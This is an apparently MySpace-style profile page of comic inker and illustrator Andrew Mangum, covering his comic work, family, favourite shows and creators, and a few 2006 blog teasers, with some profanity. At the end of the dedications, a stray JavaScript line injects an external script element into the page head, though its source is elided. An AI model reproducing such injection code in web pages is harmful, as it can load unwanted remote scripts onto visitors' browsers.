Andrew Mangum profile picture

Andrew Mangum

American Wasteland may be one of the best B-movie horror flicks never made.Wizard Magazine

About Me

This is an upcoming project of mine that's in the works, I can't say much about it now, all I can say is I have a great creative team lined up for the book, one of which is my wife, Danita!!I'm a freelance inker/illustrator, right now I'm concentrating more on my illustration work and currently working for Lightningage Studios, in association with Ape Entertainment, illustrating the upcoming book, Nick Storm Monster Hunter series due out next year. You can see my inks appear on issues one and two, and I take over illustrating on three and four. Some companies and studios I've worked with are Frontier Publishing, Morpheus Forge Entertainment, Digital Webbing, Branch Smith Publishing, Strateia Studios, and cd covers for bands from Kill-o-matic Productions and Big Time audio productions, mostly local or independent work. Also numerous commission pieces.I'm married to my beautiful wife Danita, and we have two wonderful children that we love very much. I'm also a very direct and blunt person who loves to speak my mind no matter what anyone thinks. I love spending as much time with my wife and children as possible, and especially with my wife. Friends are important but not necessary as long as I have my faith, wife, children, and my artwork I'm happy. They are my inspiration for my art work, and my wife is my Muse. Comics are like my beer and sports as long as I can go to the comic store, browse, and buy new comics, I could die happy. I'm a very simple man and there's more to me but I don't feel like boring you, plus I hate typing so I'm done. Here's a Nick Storm piece inked by me, and penciled by my good friend Kris Cagle! These pieces were done by my good friend Bob LeFevre, and inked by Me!!!

My Interests

My wife, my children, my comic work, music, film, and toys.Here's an Ascension piece I did quite a while back, it's one of my favorites, colors were provided by my good friend Drew Liedtke!..This is a shining example of people's misunderstanding of what Inkers do! I have the utmost respect for all inkers and tracers, Ha bitch! So when I'm inking a book, I don't really give a damn what people call me, all that matters is the product I'm putting out, but thank God I'm illustrating more books now. Plug, Nick Storm Monster Hunter out next year.

I'd like to meet:

Kevin Smith, Vin Diesel, Scott Stapp, Rob Zombie, Criss Angel, Eddie Vedder, Jonathan Davis, Sully Erna, Josh Brown, Mark Tremonti, Jason Lee, Tyler Perry, Quentin Tarantino, Bruce Campbell, Christopher Walken, Bill Murray, Fred Durst, Todd McFarlene and pretty much all comic creators and artists I admire.Anyone and Everyone!!!


This is one of my favorite songs to draw to, and it's also a song that goes along perfectly when someone pisses me off or disrespects My wife or family!!!
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The Simpsons, Mindfreak, Who wants to be a superhero, Miami Ink, Kathy Griffin, My life on the D-list, Mash, I love Lucy, Andy Griffith, Red Dwarf, Are you being served, Momma's family, Tales from the crypt, Roseanne, The Dinosaurs, Family guy, Futurama, and Mad about you


I've read books done by the following creators in no particular order; Deon Nuckols, Justiniano, Jerry Beck, Raven Gregory, Anthony Figaro, Brian Denham, Alex Kosakowski, Brent Erwin, Rob Zombie, Nate Jones, Steve Niles, Rob Liefeld, Tyler Kirkham, Kevin Conrad, Mario Gully, Josh Medors, Frank Miller, Jay Fotos, Rich Bonk, Dave Finch, Greg Capullo, Danny Miki, Kyle Hotz, Steven Platt, Marcus Digesu, Jaime Mendoza, Jim Daly, Erik Reeves, and Egg Embry


Our troops everywhere that fight for freedom or the almighty dollar, and our firefighter and police officers who face danger everday and who don't know if they'll come home to their wives and children, my wife Danita for putting aside a few dreams to help stand beside me and raise our children, and my parents for putting up with me throughout my life! .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"

My Blog

So tell me what you think?

After I beat Justiniano's puzzle on his blog, I had to get one of my own, so give it a try and let me know if you beat it!! This is my Ascension piece illustrated by me and colored by Drew Liedtke!...
Posted by Andrew on Tue, 24 Oct 2006 10:38:00 PST

Wizard World Texas

November 10, 11, and 12th, at the Arlington convention center, Wizard World comes to Texas, come by and check out the show, I'll be in artist's alley along with my beautiful wife Danita, stop by and s...
Posted by Andrew on Thu, 19 Oct 2006 07:56:00 PST

Petty bullshit

Nothing pisses me off more than people bitching and crying about little petty shit. People complain about everything from people being fake, self righteous, attention whores, all I can say is grow th...
Posted by Andrew on Thu, 28 Sep 2006 06:51:00 PST

Check this out!

Just want to let you know my website should be up soon! I'll keep you updated!
Posted by Andrew on Sun, 13 Aug 2006 07:39:00 PST